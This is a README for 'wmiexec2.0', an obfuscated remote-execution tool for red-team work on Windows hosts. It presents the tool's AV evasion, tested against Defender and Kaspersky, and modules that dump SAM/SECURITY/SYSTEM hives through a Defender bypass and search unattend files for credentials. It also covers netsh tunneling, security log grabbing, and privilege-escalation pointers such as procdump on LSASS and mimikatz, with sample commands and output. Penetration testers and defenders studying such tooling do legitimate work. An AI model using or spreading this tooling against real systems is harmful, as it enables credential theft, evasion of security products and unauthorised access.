wmiexec2.0

Overview

• wmiexec2.0 is the same wmiexec that everyone knows and loves.
• This 2.0 version is obfuscated to avoid well known signatures from various AV engines.
• It also has a handful of additional built in modules to help automate some common tasks on Red team engagements.
• This script is under active development and will improve with time.
• If you find an issue or want a specific module throw me a PR.
• Enjoy

Installation

• Do not wget this file with GitHubs Raw feature, it will break the Ghost emoji. Git clone the repo and it will all work.

git clone https://github.com/ice-wzl/wmiexec2.git
cd wmiexec2/
pip3 install -r requirements.txt

Modules

• Tested on:

#Windows Server 2022 Updated Febuary Defender Sigs
All modules working, no module flags
#Windows 10 Pro Defender Virus + Spyware Definition Version: 1.381.3595.0 2/14/2023
All modules working, no module flags
#Windows 10 Pro Kaspersky Standard App Version 21.8.5.452, Definitions 2/15/23
All modules working, no module flags
#Windows 8 Defender Virus and Spyware Definition Version: 1.383.35.0 2/15/2023
All modules working, no module flags
#Windows 7 Pro Defender Antispyware Definitions: v1.95.191.0 11/18/2010
Reg module not working, no module flags

Help

• To view the help and available modules:

C:\>help

Connection

• You can still connect to the remote machine the exact same way.
• You can specify whether you want a powershell shell or a cmd shell by adding the flag --shell-type powershell or --shell-type cmd
• Password auth + NT Hash auth still both apply

python3 wmiexec2.0.py DOMAIN/USERNAME:PASSWORD@10.0.0.2 -shell-type powershell
python3 wmiexec2.0.py WORKGROUP/Administrator:'Password123!@#'@10.0.0.4 -shell-type powershell

Normal wmiexec functionality

• lcd {path} change directory on your local machine
• exit you should know this one
• lput {src_file} {dst_file} upload local file to remote machine path
• lget {file} download remote file to your local machine
• ! {cmd} execute local system command --> !ls lists your current directory on your local machine

Additional modules

• Everything else from here and below is additional features added into wmiexec to make it wmiexec2.0
• cat - just to make this more unix friendly simply uses type on the remote machine to view a file....just an alias you can use
• ls || ls C:\Users - allows you to view your current target directory. Its executing the dir /a command so you will see hidden files by default without any other special options

Sysinfo

• To see basic target information use this module

👻 PS C:\>  sysinfo
[*] Target
dockerw-vg85334\administrator

[*] Hostname
DOCKERW-VG85334

[*] Arch: 
PROCESSOR_ARCHITECTURE=AMD64

[*] IP Addresses: 
   Link-local IPv6 Address . . . . . : fe80::f45c:9e14:7b55:d0b2%4(Preferred) 
   IPv4 Address. . . . . . . . . . . : 20.20.20.21(Preferred)

Anti-Virus

• View some well known security products running on the target system.
• Enumerates the process list to see if they are running.

👻 PS C:\>  av
MsMpEng.exe

Defender

• Check specific Defender settings

👻 PS C:\>  defender
[*] Defender Install Location
    InstallLocation    REG_SZ    C:\Program Files\Windows Defender\

[*] Defender Service is Running
[*] Defender Process Exclusions
	No Process Exclusions
[*] Defender Path Exclusions
[*] Tamper Protection is Disabled

VMcheck

• Attempts to detect if you are in a virtual machine (So far works for ESXi/VMWare Workstation and QEMU)
• Performs three checks
• Looks for C:\Program Files\VMWare
• Looks for common running executables in a proccess list
• Pulls the System Manufactuer from host

👻 PS C:\>  vmcheck
[*] Common Processes: 
[*] No VM Processes found
C:\Program Files\VMware Not Present
OS Manufacturer:           Microsoft Corporation
System Manufacturer:       QEMU

[*] Virtual Box Detection
[!] Found VBox Files:
File Not Found
File Not Found

unattend

• There are 11 files (that I know of) part of the unattend group in Windows that have the potential to have base64 encoded credentials in them. Find them all in one command

👻 PS C:\>  unattend
[*] Looking for: C:\unattend.txt, C:\unattend.inf

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features
    TamperProtection    REG_DWORD    0x1

End of search: 1 match(es) found.

[*] Looking for: C:\Windows\sysprep.inf
Nothing Found
[*] Looking for: C:\Windows\sysprep\sysprep.xml, C:\Windows\sysprep\sysprep.inf
Nothing Found
[*] Looking for: C:\Windows\Panther\Unattended.xml, C:\Windows\Panther\Unattend.xml
06/12/2024  04:33 PM            24,206 unattend.xml

[*] Looking for: C:\Windows\Panther\Unattend\Unattend.xml, C:\Windows\Panther\Unattend\Unattended.xml
Nothing Found
[*] Looking for: C:\Windows\System32\Sysprep\unattend.xml, C:\Windows\System32\Sysprep\unattended.xml
Nothing Found

Regrip

• Save off the SAM, Security and System hives to your local machines. Defender blocks this by default, so I had to find a bypass working as of 6/7/24. Try to not get this signatured, thanks in advance.

Tunneling

• Leverage Windows built in netsh tunneling without having to type the whole thing out
• See below for usage options

👻 PS C:\>  showtun
👻 PS C:\>  addtun 10000 10.0.0.5 443
👻 PS C:\>  showtun



Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
*               10000       10.0.0.5        443


👻 PS C:\>  deltun 10000
👻 PS C:\>  showtun
👻 PS C:\>  

Loggrab

• Download log file of your choice
• Will download any file in C:\windows\system32\winevt\logs
• Use: loggrab Security.evtx

👻 PS C:\>  loggrab Security.evtx
[*] Security.evtx
[*] Downloading C:\\Windows\system32\spool\drivers\color\Security.evtx


        1 file(s) copied.
👻 PS C:\>  !ls
av.py  debug.log  __pycache__  README.md  remoteshell.py  requirements.txt  Security.evtx  survey.conf	wmiexec2.py
👻 PS C:\>  

Tokens

• This module will enumerate your currently Enabled tokens and attempt to match them with a priv esc

👻 PS C:\>  tokens
[*] SeImpersonate Enabled:
	Juicy-Potato
	RougeWinRM
	SweetPotato
	PrintSpoofer
[*] SeBackupPrivilege Enabled:
	https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1
	https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug
	https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610&ab_channel=IppSec
[*] SeTakeOwnershipPrivilege Enabled:
	takeown /f "C:\windows\system32\config\SAM"
	icacls "C:\windows\system32\config\SAM" /grant <your_username>:F
[*] SeDebugPrivilege Enabled:
	Procdump.exe on LSASS.exe, use mimikatz

Survey

• under active development
• Input your own custom commands into survey.conf file seperated by a new line, or use the basic one that I have provided
• There are two options with this module:
• run module with survey which will print out the command you ran plus the output of that command
• Or run with survey savethis will return none of the commands to stdout, but will save all commands run and their output into survey.txt located in your local pwd.

survey save

• to run the survey module and save the output to your local station (No stdout)

👻 PS C:\>  survey save
[*] Saving all output from survey to survey.txt in your local pwd
[*] Starting Survey
[*] Survey Completed
👻 PS C:\>  !ls
av.py  debug.log  __pycache__  README.md  remoteshell.py  requirements.txt  Security.evtx  survey.conf	survey.txt  wmiexec2.py
👻 PS C:\>  !head survey.txt
[*] hostname
 
DOCKERW-VG85334
[*] whoami
 
dockerw-vg85334\administrator
[*] whoami /priv
 
PRIVILEGES INFORMATION
----------------------
👻 PS C:\>  

survey

👻 PS C:\>  survey
[*] Starting Survey
[*] hostname

DOCKERW-VG85334

[*] whoami

dockerw-vg85334\administrator

[*] whoami /priv
--snip--

Known impacket issues

• If you recieve this error:

python3 wmiexec2.py Administrator:'abc123!!!'@172.17.0.2 -shell-type powershell  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[-] Can't find a valid stringBinding to connect

• This is usually caused when a target system is NAT'ed in some way. A target behind a router, a cloud VPS, or a docker container are three good examples that will cause this error.
• To read more
• fortra/impacket#272

To Fix

• Find your dcomrt.py file (if you pip3 install -r requirements.txt) it should be under ~

find / -type f -name "dcomrt.py" 2>/dev/null
/opt/impacket-0.11.0/build/lib/impacket/dcerpc/v5/dcomrt.py
/opt/impacket-0.11.0/impacket/dcerpc/v5/dcomrt.py
/opt/Responder/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcomrt.py
/home/ubuntu/.local/lib/python3.10/site-packages/impacket/dcerpc/v5/dcomrt.py

• Edit the file

vim /home/ubuntu/.local/lib/python3.10/site-packages/impacket/dcerpc/v5/dcomrt.py

• Find this line

if stringBinding is None:

• Comment out this line right before the above line

#raise Exception('Can\'t find a valid stringBinding to connect')

• Add these two lines instead

stringBinding = 'ncacn_ip_tcp:%s%s' % (self.get_target(), bindingPort)
LOG.info('Can\'t find a valid stringBinding to connect,use default!')

• That should fix the issue!